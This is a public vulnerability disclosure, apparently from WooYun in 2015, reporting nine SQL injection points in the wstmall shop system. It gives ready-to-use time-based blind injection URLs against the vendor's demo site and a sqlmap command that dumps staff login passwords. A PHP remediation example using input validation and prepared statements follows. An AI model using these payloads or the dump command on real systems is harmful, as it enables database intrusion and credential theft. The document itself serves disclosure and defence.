
Vulnerability summary

Defect ID: wooyun-2015-0135248

Title: SQL injection in the wstmall shop system (9 instances, demonstrated on the demo site)

Vendor: wstmall

Author: 不能忍

Submitted: 2015-08-19 17:51

Fix deadline: 2015-10-03 17:52

Published: 2015-10-03 17:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-08-19: actively contacting the vendor and waiting for the vendor to claim the report; details not public
2015-10-03: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

ThinkPHP framework, PHP 5.3; magic_quotes_gpc is irrelevant (the injection points are numeric, so no quote character is needed). Some of the injections are blind, some are not. None of the parameters are filtered.

Detailed description:

Examples: search Baidu for "powered by wstmall".
I won't paste the code; the vendor can find it themselves, it's all very simple.
http://demo.wstmall.com/index.php/home/goods_cats/querybylist/?id=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--
http://demo.wstmall.com/index.php/home/areas/getAreaAndCommunitysByList/?areaId=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--
http://demo.wstmall.com/index.php/Home/orders/orderCancel/?orderId=1 AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--
http://demo.wstmall.com/index.php/Home/orders/checkOrderPay/?orderIds=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'%23
http://demo.wstmall.com/index.php/Home/orders/orderConfirm/?orderId=1 AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--
http://demo.wstmall.com/index.php/home/payments/getAlipayURL/?orderIds=1000000013&payCode=1%27) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'%23
// requires an order with orderIds=1000000013 whose orderStatus is greater than 0
All of the above are blind injections; register an account on the demo site before submitting them. The next few should be tested with sqlmap: they are not blind, but the result is not echoed on the web page; the response is JSON, so you need a packet-capture tool to see it (which just shows how powerful sqlmap is...). Because the requests are fairly complex, I won't capture and demonstrate them here; use sqlmap!
http://demo.wstmall.com/index.php/Home/payment/topay/?orderIds=1*
http://demo.wstmall.com/index.php/Home/payments/topay/?orderIds=1*
http://demo.wstmall.com/index.php/Home/orders/getorderinfo/?orderId=1*
./sqlmap.py -u "http://demo.wstmall.com/index.php/Home/payment/topay/?orderIds=1*" --cookie="remember to pass your logged-in cookie here, otherwise the injection won't work" --threads 10 --batch -D wstmall -T wst_staffs -C loginpwd,staffname --dump

Proof of vulnerability:

Only one blind SQL injection is demonstrated here; for the others, register an account on the demo site and try them yourself, they are all very simple.

(screenshot: 1.jpg)


Fix recommendation:

Filter the input.
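The report's one-word fix ("filter") deserves a concrete shape. The example below is added here and is not the vendor's code: it shows the kind of controller method the report's payloads imply (a numeric GET value spliced into an `IN (...)` clause, so closing the parenthesis needs no quote and magic_quotes_gpc offers no protection) next to a hardened version that validates the parameter's shape and binds every value with PDO. The function names, the `goods_cats` table, the `parentId` column and the `$db` handle are assumptions for illustration.

```php
<?php
// Added example, not code from wstmall. Table and column names are hypothetical.

// Vulnerable pattern (assumed from the report's payloads): the request value is
// concatenated straight into the SQL text. Because the expected value is
// numeric, an attacker does not need a quote character, so magic_quotes_gpc
// (the "GPC" the report says is irrelevant) changes nothing here.
function queryByListVulnerable(PDO $db, array $get): array
{
    $id  = $get['id'] ?? '';
    $sql = "SELECT * FROM goods_cats WHERE parentId IN ($id)";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version: accept only a comma-separated list of positive integers,
// then bind each value as a separate placeholder. Nothing from the request is
// ever part of the SQL string itself.
function queryByListSafe(PDO $db, array $get): array
{
    $raw = $get['id'] ?? '';
    if (!preg_match('/^\d+(,\d+)*$/', $raw)) {
        // Reject rather than "clean": a value that is not a list of integers
        // is never a legitimate request for this endpoint.
        throw new InvalidArgumentException('id must be a comma-separated list of integers');
    }
    $ids = array_map('intval', explode(',', $raw));

    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("SELECT * FROM goods_cats WHERE parentId IN ($placeholders)");
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Same idea for the single-value endpoints in the report (orderId, areaId):
// cast to int and bind, so "1 AND (SELECT ...)" becomes the integer 1 or is
// rejected outright.
function orderIdFromRequest(array $get): int
{
    $raw = $get['orderId'] ?? '';
    if (!ctype_digit($raw)) {
        throw new InvalidArgumentException('orderId must be a positive integer');
    }
    return (int) $raw;
}

function cancelOrderSafe(PDO $db, array $get, int $userId): bool
{
    $orderId = orderIdFromRequest($get);
    // Bind both the order and the owning user: the order-related endpoints in
    // the report require a logged-in session, so scope the update to that user.
    $stmt = $db->prepare(
        'UPDATE orders SET orderStatus = -1 WHERE orderId = :orderId AND userId = :userId'
    );
    $stmt->execute([':orderId' => $orderId, ':userId' => $userId]);
    return $stmt->rowCount() === 1;
}
```

The strict regular expression on `id` and the `ctype_digit()` check on `orderId` are what make the "filter" enforceable: any input that is not purely numeric is rejected before a query is built, and prepared statements guarantee that even a value which passes validation is sent as data, not as SQL. Rejecting with an exception (mapped to a 400 response by the framework) is preferable to silently stripping characters, since a stripped payload can still slip through when the stripping rules and the database's parsing rules disagree.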

Copyright notice: please credit the source when republishing: 不能忍@WooYun


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined to respond.